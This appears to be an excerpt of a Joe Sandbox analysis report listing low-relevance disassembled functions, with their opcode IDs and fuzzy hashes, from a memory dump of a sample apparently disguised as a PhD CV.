                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c8d0e9fa5654958f11c20b2ddbee6645adc7ffc5e0c363f44eec7f20ee2abc3b
                                                                                                  • Instruction ID: 78902143ac618671c0340c9fc9eac5f2342f7d2f703a3e13f8b256fb447bd347
                                                                                                  • Opcode Fuzzy Hash: c8d0e9fa5654958f11c20b2ddbee6645adc7ffc5e0c363f44eec7f20ee2abc3b
                                                                                                  • Instruction Fuzzy Hash: 85215E76A10205DFCB14CF98C591B6EBBB5FB48754F20416DD505A7310CB71AD46DBD0
                                                                                                  Function 00F7666D Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e9b3877a63b749e67acae4b11e6c032ffb5021f7153a423fdeb228b1f7046796
                                                                                                  • Instruction ID: 8c8edb2a574fc8d347e16a755165ffea26aba9378a1eb3908d1666fcd556ec40
                                                                                                  • Opcode Fuzzy Hash: e9b3877a63b749e67acae4b11e6c032ffb5021f7153a423fdeb228b1f7046796
                                                                                                  • Instruction Fuzzy Hash: 8A216A71600A00EFC7249F69D881F66B3F8FB44754F50882EE59ECB251DA30BD45EB61
                                                                                                  Function 00FD6400 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4def2b40c78af9d77880c2adf0354b9f13ec9c52b6e45783acd45808ea6de0d
                                                                                                  • Instruction ID: 7b18e589f9a6fc3960c997b71f6a3f47b80724efc794d1e13d4d58a361aaca9a
                                                                                                  • Opcode Fuzzy Hash: b4def2b40c78af9d77880c2adf0354b9f13ec9c52b6e45783acd45808ea6de0d
                                                                                                  • Instruction Fuzzy Hash: 7C11E332280610EBC722DF9DCD40F4A77A9EF9AB60F14402AF604DB351DA74E905E7D0
                                                                                                  Function 00F6E7E0 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5ddb7d0a1e54f8c288bb44db653aa06beee0c831e63073356a7662ae6e987fac
                                                                                                  • Instruction ID: f806333df4a9758defcf41256b71557212043eb0891fa6a29b06ac8988d6e522
                                                                                                  • Opcode Fuzzy Hash: 5ddb7d0a1e54f8c288bb44db653aa06beee0c831e63073356a7662ae6e987fac
                                                                                                  • Instruction Fuzzy Hash: 21110877700100AFCB29D778CD91A6B725AEBD5770B254139E5178B290E9319D06E2E0
                                                                                                  Function 00F765D0 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cf146a0f376b1f8b6b0457b0de824575ee8bab343778b64c77cacd766c449f83
                                                                                                  • Instruction ID: 86f793661e51b6625ab7ea4254a6bd9a7e3f8a8c0606849659b429ef8e34906f
                                                                                                  • Opcode Fuzzy Hash: cf146a0f376b1f8b6b0457b0de824575ee8bab343778b64c77cacd766c449f83
                                                                                                  • Instruction Fuzzy Hash: 7E11BF72E00604AFCB65CF59C980A5ABBE8AB94760F91807AE909DB311D634DE04EB94
                                                                                                  Function 0100A464 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
                                                                                                  • Instruction ID: 951357494e0a9b8fb2e86f3af2208989267462b359e554732476b512301d31ad
                                                                                                  • Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
                                                                                                  • Instruction Fuzzy Hash: FA110836600919EFDB1ACF58CC05B9DB7F5EF84310F058269EC4597380DA35AE51CB80
                                                                                                  Function 00F409F0 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd280fa71bf10f3757d7dfd4ed06d9eebc6eb36ad596d634b9fdc95b425279a6
                                                                                                  • Instruction ID: a5891fbd5c5767a481c9841b9d50d9bae5d9accd932c97fb097ad43a327d9549
                                                                                                  • Opcode Fuzzy Hash: fd280fa71bf10f3757d7dfd4ed06d9eebc6eb36ad596d634b9fdc95b425279a6
                                                                                                  • Instruction Fuzzy Hash: B12106B6A00B059FD3A0CF29D441B52BBF4FB48B20F10492EE98AC7B40E775E814DB90
                                                                                                  Function 00FCE461 Relevance: .1, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
                                                                                                  • Instruction ID: 045e539253093075ebd44e6907f88f047393a01b9cecb33ea32e70bbe3149260
                                                                                                  • Opcode Fuzzy Hash: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
                                                                                                  • Instruction Fuzzy Hash: 9511CE3AA00606AFDB38DF04CE02F56BBA5EB40360F05806CF8458B160D734DD40E790
                                                                                                  Function 00F6270D Relevance: .1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74c4737acd920fca6a9314944d263fe13f3ce3b0af4b3c3ba4e891d06daa3caf
                                                                                                  • Instruction ID: 8618a6ef35b894242c73549677f9062360511f1c008ba2cca11adb6d89237ad2
                                                                                                  • Opcode Fuzzy Hash: 74c4737acd920fca6a9314944d263fe13f3ce3b0af4b3c3ba4e891d06daa3caf
                                                                                                  • Instruction Fuzzy Hash: 02012672744A409BE325526A8C89F677BCDEF813A4F194065F9018B651DA58DC04E272
                                                                                                  Function 00F445B0 Relevance: .1, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e32f036a966f11d3408e475cc4b495efbc0dd085499fe6b3f67f51bc3f6ca1dc
                                                                                                  • Instruction ID: e1385afc6c0d512ffca4d5dc0eaf4862f154194610a8c2737c6a04dfe012bf51
                                                                                                  • Opcode Fuzzy Hash: e32f036a966f11d3408e475cc4b495efbc0dd085499fe6b3f67f51bc3f6ca1dc
                                                                                                  • Instruction Fuzzy Hash: FA11A072A00684AFDB21DF69D840B56BBA8EB5AB74F064115FD04EB690C374FC40EB60
                                                                                                  Function 00F76540 Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bd10a2cb0ff9c9d0d2ef343911ea293aae46d7902fd2b0d7fd892f24312eb65c
                                                                                                  • Instruction ID: ff1ad522d42aca005fd114f1c479b79471bcd49a25faed1700e25f7db1e6bf18
                                                                                                  • Opcode Fuzzy Hash: bd10a2cb0ff9c9d0d2ef343911ea293aae46d7902fd2b0d7fd892f24312eb65c
                                                                                                  • Instruction Fuzzy Hash: E311CE72E00B15ABCB22EF58CD80B5EF7B8EF88750F544056E905A7205DB74EE00BBA1
                                                                                                  Function 00F6E94E Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 02bc8714011e877d645b8f2c9d6c52f4b82fe0223e5646375128c3c8b2ebef94
                                                                                                  • Instruction ID: c8afb707537f79d451ddea2fadb56c1dd5efd1dbec309f2fa19767ce67ba349b
                                                                                                  • Opcode Fuzzy Hash: 02bc8714011e877d645b8f2c9d6c52f4b82fe0223e5646375128c3c8b2ebef94
                                                                                                  • Instruction Fuzzy Hash: AF019E72610108AFC725DB19E809F16BBEDEFC5329F25816AE0458B2B1D7B8EC42DB50
                                                                                                  Function 00F6E45E Relevance: .1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                  • Instruction ID: 6db8c6a4247afa9eaffb21891430864a223214163d91bc30fc5fde253e2ac00c
                                                                                                  • Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                  • Instruction Fuzzy Hash: CB11CC7BA059818BD7128768C948B2577D8EF42779F1900F0ED019F682DB2CDC45F750
                                                                                                  Function 00FCE3DD Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
                                                                                                  • Instruction ID: 454b587fe3fb530ae8ac4f39df225524aeb2040a749bfe7e77c62fb771ce7a65
                                                                                                  • Opcode Fuzzy Hash: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
                                                                                                  • Instruction Fuzzy Hash: E701D236B00106AFD729DF04CE02F5A7AA5EB80760F19802CF9049B260E775DD44F790
                                                                                                  Function 00F3A200 Relevance: .1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                                  • Instruction ID: 869f67cdf2717b5b262910e745941a9e13900a855d3c5c9c5423a1dea88ebc47
                                                                                                  • Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                                  • Instruction Fuzzy Hash: 60012232805B11ABCB308F16D840A2B7BF4EF56B70B00862DFCD58B291C736D900EBA1
                                                                                                  Function 00F46179 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a46afda71c496b2249033fef27504000611ba6d1f97815fa30a4fd04d98b3efe
                                                                                                  • Instruction ID: a23d1b6bebf535938198f9a3c93440a31015833c2235f013eaee70895e0d0702
                                                                                                  • Opcode Fuzzy Hash: a46afda71c496b2249033fef27504000611ba6d1f97815fa30a4fd04d98b3efe
                                                                                                  • Instruction Fuzzy Hash: A9117C71A41218ABDB75EB24CC42FE972B4BF44B10F1041D5B719E60E1DB38AE85EF85
                                                                                                  Function 00F76CC0 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
                                                                                                  • Instruction ID: e6e37b786500387c6e65dc30fc7118ec17aa52c1899e73cf5d03af34546eb43d
                                                                                                  • Opcode Fuzzy Hash: d952b55ae5c06c589b756f72370e52ee0d53ea04a3394b42dd51e4334f57892a
                                                                                                  • Instruction Fuzzy Hash: C3012872715555ABDB359B15C811B9BBF64DB41720F15C01AB90ADB2C0D674D880D3A2
                                                                                                  Function 00F36DA6 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91cbd3665f14aaa51a642041c9cb8072c2e4e68bf6017165f2881ba66f7c902f
                                                                                                  • Instruction ID: 55db9bdf43e9535c3e57a237f716bbee3cc9ebea92f3a0e79048506ce104e16d
                                                                                                  • Opcode Fuzzy Hash: 91cbd3665f14aaa51a642041c9cb8072c2e4e68bf6017165f2881ba66f7c902f
                                                                                                  • Instruction Fuzzy Hash: 0A016831B08603ABDF106E2A9C41D2677E9FB91320F04053CF84187651CBA4EC01E7D0
                                                                                                  Function 00FD6090 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e149e63e9bf1185c5f8b0f59dfee7aeff595d2b43a08dfa6699e88e1f5bb20f
                                                                                                  • Instruction ID: c03ac64965f285b24a98f6306b2a4b408ae6cbc247bac0b0a679183cd7070db2
                                                                                                  • Opcode Fuzzy Hash: 9e149e63e9bf1185c5f8b0f59dfee7aeff595d2b43a08dfa6699e88e1f5bb20f
                                                                                                  • Instruction Fuzzy Hash: 0F11C8326441469FD711CF58D810BA2F7BAFB5A314F1C815AE944CB312DB32EC45EBA0
                                                                                                  Function 00FCC490 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca403c61ee235e552ee2aa35de41177218293b63d3ebd3f3bfd9c5f6062f7515
                                                                                                  • Instruction ID: 353228abfa2f5bad869f358e40f22209d7746bbfea7bdad94447c897c8028675
                                                                                                  • Opcode Fuzzy Hash: ca403c61ee235e552ee2aa35de41177218293b63d3ebd3f3bfd9c5f6062f7515
                                                                                                  • Instruction Fuzzy Hash: 0311FAB1A002599FCB04DFA9D945AAEB7F8FF48310F10806AF915E7341D678EA01DBA4
                                                                                                  Function 00FEE5E0 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1d83ac868dd65eb4fb93a02800fe1d55aa6db84394c05c84ec5231bfaf6c5ad
                                                                                                  • Instruction ID: 140847d893b4815d315dc1a32286af74cee5f66120796b7078f91ffc057efdfc
                                                                                                  • Opcode Fuzzy Hash: f1d83ac868dd65eb4fb93a02800fe1d55aa6db84394c05c84ec5231bfaf6c5ad
                                                                                                  • Instruction Fuzzy Hash: 2301D8315101509BCB32AB16D844D3AB7A9FFB3762B14406EF9455B111CB35DC45EB90
                                                                                                  Function 00F82010 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33099c94b167226ff5d989f8406134dadd859688caea4a2aa86de309dbb00f43
                                                                                                  • Instruction ID: e27660389e7de03c22a41a58f0145a2b3a71847d0c0162ac572f46421a30dc0e
                                                                                                  • Opcode Fuzzy Hash: 33099c94b167226ff5d989f8406134dadd859688caea4a2aa86de309dbb00f43
                                                                                                  • Instruction Fuzzy Hash: AB118071A00209EFDB04EF64CC55FEE7BB9EB44714F104099F911AB281EA39EE15EB90
                                                                                                  Function 00F7E4EF Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0e8bdf2aa60e564840ab4cd2a57371fd93b1bf89664f3b959bbd9be712c19c16
                                                                                                  • Instruction ID: fabb5a853a09ca5e39a16bc31ce65d139e6ab4000af4c956912ea7cbd35afb9f
                                                                                                  • Opcode Fuzzy Hash: 0e8bdf2aa60e564840ab4cd2a57371fd93b1bf89664f3b959bbd9be712c19c16
                                                                                                  • Instruction Fuzzy Hash: B101F7712005457FC710BB79CC81E53B7ACFF897A1B000225BA0883552CB68ED01DAF0
                                                                                                  Function 00FD6550 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73ba3d6f8996b74499db8b30818d892056b542a690a6d71165aa6db66af40cf3
                                                                                                  • Instruction ID: 5b4a44db0d96e28ad602baa0a0738a20cb777862910f484226b1271dbce6dd83
                                                                                                  • Opcode Fuzzy Hash: 73ba3d6f8996b74499db8b30818d892056b542a690a6d71165aa6db66af40cf3
                                                                                                  • Instruction Fuzzy Hash: A0012D32204211DBC720DF28D849BA6B7A9EF89760F19011AF828C7380D734ED44D7D1
                                                                                                  Function 00FCC0E0 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a343782c306e8170ffb43eddaa2e41732561279f159ed98bef6eb2a1c5b2758
                                                                                                  • Instruction ID: acd17601146a8217ce0ef5b2412cca899380af6c4801edda2c1f95de68ebe0d9
                                                                                                  • Opcode Fuzzy Hash: 2a343782c306e8170ffb43eddaa2e41732561279f159ed98bef6eb2a1c5b2758
                                                                                                  • Instruction Fuzzy Hash: 89115E71A00209EFCB15DFA5CD46FAE7BB9AB48314F044059FD0597351DA35ED11DB90
                                                                                                  Function 00FCC5FC Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 508eba92d292b19c633539cc4726270d584fdf4f800ea3666794f99e3cb08128
                                                                                                  • Instruction ID: 2ad189f55c6ebd209a8a8c81af6a89dd880d49ca961fed402b3f1909fff51bc1
                                                                                                  • Opcode Fuzzy Hash: 508eba92d292b19c633539cc4726270d584fdf4f800ea3666794f99e3cb08128
                                                                                                  • Instruction Fuzzy Hash: 34113CB16043049FC700DF69D946A5BBBE8EF88710F00855EF998D7351E634E900DB92
                                                                                                  Function 00FCC691 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c02b451d9eb1d6610b4e01fd5c922a1cf91868feea4bd62700f52654d6408d1e
                                                                                                  • Instruction ID: 0a7e1c501910d6264a7b2e201be71fa8698e6736b5fd048e9a4d30891e0881a3
                                                                                                  • Opcode Fuzzy Hash: c02b451d9eb1d6610b4e01fd5c922a1cf91868feea4bd62700f52654d6408d1e
                                                                                                  • Instruction Fuzzy Hash: 55113CB16043449FC710DF69D946A5BBBE8EF88710F00855EF958D7355E634E900DB92
                                                                                                  Function 01014600 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                                  • Instruction ID: 093324a3c44abfceeff17c1fe88e6fc10b272e996119b709afb53dd794fb69bb
                                                                                                  • Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                                  • Instruction Fuzzy Hash: 15012432200A00DFD721DA69C801F97B7EAFBC9348F044858E692CB668DB78F880C790
                                                                                                  Function 00F7415F Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e0f9c2504f71a3126e34d1b539447526918c4c9bb2927b633f70b9a54c275bdf
                                                                                                  • Instruction ID: 6a0931dc44e374994aca45933e5be4eda2a51d5e41d402a3b0ec12ed08534e53
                                                                                                  • Opcode Fuzzy Hash: e0f9c2504f71a3126e34d1b539447526918c4c9bb2927b633f70b9a54c275bdf
                                                                                                  • Instruction Fuzzy Hash: 9201A236904201ABC326EF7E96586A1BBE8FB59324714812AE40DC3B14D372FD41EB15
                                                                                                  Function 00F3821B Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
